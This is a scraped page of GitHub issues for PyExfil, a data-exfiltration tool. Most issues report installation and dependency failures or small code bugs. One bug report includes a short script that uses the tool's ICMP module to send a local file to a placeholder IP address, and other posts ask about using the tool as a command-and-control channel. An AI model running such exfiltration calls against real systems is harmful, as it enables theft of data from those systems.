ytisf / pyexfil Goto Github PK

Hello ytisf, I don't know where to put my question but why do you don't use scapy for the exfiltration ? (thanks for the zoo by the way)

Hello, opening this issue to let you know that there is a new, actively maintained, Python3 only pytube fork: https://github.com/hbmartin/pytube3

Should this package be installed with the zip_safe flag set to true?

See here:

http://peak.telecommunity.com/DevCenter/setuptools#setting-the-zip-safe-flag

##Note:
For maximum performance, Python packages are best installed as zip files. Not all packages, however, are capable of running in compressed form, because they may expect to be able to access either source code or data files as normal operating system files. So, setuptools can install your project as a zipfile or a directory, and its default choice is determined by the project's zip_safe flag.

You can pass a True or False value for the zip_safe argument to the setup() function, or you can omit it. If you omit it, the bdist_egg command will analyze your project's contents to see if it can detect any conditions that would prevent it from working in a zipfile. It will output notices to the console about any such conditions that it finds.

Currently, this analysis is extremely conservative: it will consider the project unsafe if it contains any C extensions or datafiles whatsoever. This does not mean that the project can't or won't work as a zipfile! It just means that the bdist_egg authors aren't yet comfortable asserting that the project will work. If the project contains no C or data files, and does no file or path introspection or source code manipulation, then there is an extremely solid chance the project will work when installed as a zipfile. (And if the project uses pkg_resources for all its data file access, then C extensions and other data files shouldn't be a problem at all. See the Accessing Data Files at Runtime section above for more information.)

However, if bdist_egg can't be sure that your package will work, but you've checked over all the warnings it issued, and you are either satisfied it will work (or if you want to try it for yourself), then you should set zip_safe to True in your setup() call. If it turns out that it doesn't work, you can always change it to False, which will force setuptools to install your project as a directory rather than as a zipfile.

Of course, the end-user can still override either decision, if they are using EasyInstall to install your package. And, if you want to override for testing purposes, you can just run setup.py easy_install --zip-ok . or setup.py easy_install --always-unzip . in your project directory. to install the package as a zipfile or directory, respectively.

In the future, as we gain more experience with different packages and become more satisfied with the robustness of the pkg_resources runtime, the "zip safety" analysis may become less conservative. However, we strongly recommend that you determine for yourself whether your project functions correctly when installed as a zipfile, correct any problems if you can, and then make an explicit declaration of True or False for the zip_safe flag, so that it will not be necessary for bdist_egg or EasyInstall to try to guess whether your project can work as a zipfile.

File name is currently generated but need to use real file name. Currently some issue with encoding.

Need to check all file formats and not just PNG to make sure all data are moving

I am failing to install PyExFill with pip (pip install --user PyExfil) but it fails due to the following error:

➜  pip install --user PyExfil
Collecting PyExfil
  Using cached PyExfil-1.10.4.tar.gz (5.2 kB)
  Preparing metadata (setup.py) ... done
Requirement already satisfied: requests>=1.0.0 in /home/oma/.pyenv/versions/3.11.2/lib/python3.11/site-packages (from PyExfil) (2.28.2)
Collecting impacket>=0.9.0 (from PyExfil)
  Using cached impacket-0.11.0-py3-none-any.whl
Collecting slackclient (from PyExfil)
  Using cached slackclient-2.9.4-py2.py3-none-any.whl (97 kB)
Requirement already satisfied: progressbar in /home/oma/.pyenv/versions/3.11.2/lib/python3.11/site-packages (from PyExfil) (2.5)
INFO: pip is looking at multiple versions of pyexfil to determine which version is compatible with other requirements. This could take a while.
Collecting PyExfil
  Using cached PyExfil-1.3-py3-none-any.whl (2.5 kB)
ERROR: Cannot install pyexfil==1.10.4 and pyexfil==1.3 because these package versions have conflicting dependencies.

The conflict is caused by:
    pyexfil 1.10.4 depends on zlib
    pyexfil 1.3 depends on zlib

To fix this you could try to:
1. loosen the range of package versions you've specified
2. remove package versions to allow pip attempt to solve the dependency conflict

ERROR: ResolutionImpossible: for help visit https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-dependency-conflicts

The zlib library is a module from the standard library (link) and i have installed both packages (zlib1g zlib1g-dev) recommended by different stack overflow questions. So the requirement should be fulfilled.

Info about my system:

• Kali on WSL (Windows subsystem for Linux)

VERSION_ID="2023.3"
VERSION="2023.3"
VERSION_CODENAME=kali-rolling

• Python version: Python 3.11.2

pip3 install pyExfil
Collecting pyExfil
Downloading PyExfil-1.10.4.tar.gz (5.2 kB)
Requirement already satisfied: Pillow in /usr/lib/python3/dist-packages (from pyExfil) (7.0.0)
Requirement already satisfied: PyCrypto in /usr/lib/python3/dist-packages (from pyExfil) (2.6.1)
Collecting base58
Downloading base58-2.0.1-py3-none-any.whl (4.3 kB)
ERROR: Could not find a version that satisfies the requirement ftplib (from pyExfil) (from versions: none)
ERROR: No matching distribution found for ftplib (from pyExfil)

My python Version is -
Python 3.8.5
and pip versions is -
pip 20.0.2

I'm trying to use PyExfil and I'm having several problems starting from a clean install (Python 3.9.1, Linux).

I'm following the instructions in the README:

git clone https://www.github.com/ytisf/PyExfil
cd PyExfil
pip install --user -r requirements.txt

except with pip install -r requirements3.txt because I'm in a venv and requirements.txt doesn't exist. I also removed the librosa (audio analysis) dependency since in turn it depended on llvm-libs.

The readme then specifies pip setup.py --user install (that should be python). I'm getting error: option --user not recognized, so I drop it. Python then says:

rocessing dependencies for PyExfil==1.3
Searching for urllib2
Reading https://pypi.org/simple/urllib2/
Couldn't find index page for 'urllib2' (maybe misspelled?)
Scanning index of all packages (this may take a while)
Reading https://pypi.org/simple/
No local packages or working download links found for urllib2
error: Could not find suitable distribution for Requirement.parse('urllib2')

It is actually a Python 2 standard library so I removed the requirement; note however that it is still used in HTTPS and QUIC.

Likewise for hashlib, although with a more cryptic error.

The installation then proceeds successfully, but I can't import anything from the package:

Traceback (most recent call last):
  File "/home/yuri/codice/bizarre-net/socket/pyexfil-bridge.py", line 3, in <module>
    from pyexfil.network.ICMP.icmp_exfiltration import send_file, init_listener
ModuleNotFoundError: No module named 'pyexfil.network'

Indeed, importing it in the REPL shows that it only exports AUTHORS, NAME and a few other variables.

I then tried installing it "manually" by copying the pyexfil directory to where I needed it. I then found out that even a simple usage doesn't work:

#!/usr/bin/python

from pyexfil.network.ICMP.icmp_exfiltration import send_file, init_listener

send_file("1.2.3.4", file_path="/tmp/file")

Traceback (most recent call last):
  File "/home/yuri/codice/bizarre-net/socket/pyexfil-bridge.py", line 5, in <module>
    send_file("1.2.3.4", file_path="/tmp/file")
  File "/home/yuri/codice/bizarre-net/socket/pyexfil/network/ICMP/icmp_exfiltration.py", line 76, in send_file
    icmp.contains(ImpactPacket.Data(current_packet))
  File "/home/yuri/codice/bizarre-net/socket/venv/lib/python3.9/site-packages/impacket/ImpactPacket.py", line 485, in __init__
    self.set_data(aBuffer)
  File "/home/yuri/codice/bizarre-net/socket/venv/lib/python3.9/site-packages/impacket/ImpactPacket.py", line 488, in set_data
    self.set_bytes_from_string(data)
  File "/home/yuri/codice/bizarre-net/socket/venv/lib/python3.9/site-packages/impacket/ImpactPacket.py", line 59, in set_bytes_from_string
    self.__bytes = array.array('B', data)
TypeError: cannot use a str to initialize an array with typecode 'B'

I believe this error is caused by my version of impacket being too recent, as there are no specific constraints in requirements.txt or setup.py. I think the author will need to freeze the packages to known-good versions.

To ytisf,

Hi, I'm a visitor, who's looking on your tool (PyExfil), I would like to ask you about the tool working.
How I would contact you in a private way? Please provide anything about your email or contact information to me. I'm studying about DNS exfiltration data from DNS traffic, your tool that it's interesting for me.

I'm looking for your answer, please help me.

At line 118 and 125, the code snippet

except socket.error, msg:

should be replaced with

except socket.error as msg:.

Could this be extended to be a bidirectional C&C channel, or is it just for sending output at the moment?

Apologies if silly question, have not yet had time to RTFC :P but seriously, nice work :D

Currently it does none.
Need to get the destination IP & the file to exfiltrate as arguments.

Getting the following error when trying this command: pip3 install --user -r requirements.txt

Could not fetch URL https://pypi.python.org/simple/zlib/: 404 Client Error: Not Found (zlib does not exist) - skipping
Could not find a version that satisfies the requirement zlib (from -r requirements.txt (line 5)) (from versions: )

Nope. Not code monkey. Both of these were developed in a hurry and too late at night. It literally looks like a monkey with a keyboard wrote them. Need to write it in a way which will less resemble assembly.

According to the documentation https://docs.scipy.org/doc/scipy/reference/signal.html there is no qammod / qamdemod functions.

When launching the new pushed script "35 jack", I got the following error:

Error: module 'scipy.signal' has no attribute 'qammod'